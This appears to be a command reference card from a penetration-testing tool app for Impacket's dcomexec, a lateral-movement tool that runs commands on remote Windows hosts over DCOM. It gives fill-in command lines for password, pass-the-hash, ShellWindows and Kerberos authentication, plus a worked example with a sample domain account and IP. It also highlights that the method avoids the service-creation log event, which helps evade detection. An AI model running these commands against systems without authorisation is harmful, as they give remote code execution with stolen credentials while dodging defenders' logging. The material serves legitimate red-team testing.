Impacket dcomexec.py

Execute commands over DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow) without dropping a service. Quieter than psexec/smbexec, no service installation event ID 7045.

Tool
impacket-dcomexec
Category
Lateral Movement / Remote Shells
Platform
linux
Requires
password
Protocols
RPC, SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-dcomexec '<domain>/<user>:<password>@<target>'

Credential variants

The same attack using a different authentication material.

Pass-the-Hash requires NTLM hash

impacket-dcomexec -hashes :<nt-hash> '<domain>/<user>@<target>'

ShellWindows Object requires password

impacket-dcomexec -object ShellWindows '<domain>/<user>:<password>@<target>'

Kerberos requires Kerberos ticket

impacket-dcomexec -k -no-pass '<domain>/<user>@<target>'

Examples

impacket-dcomexec corp.local/jdoe:'Password123!'@10.10.10.10

Tags

impacket dcomexec lateral-movement dcom stealth

References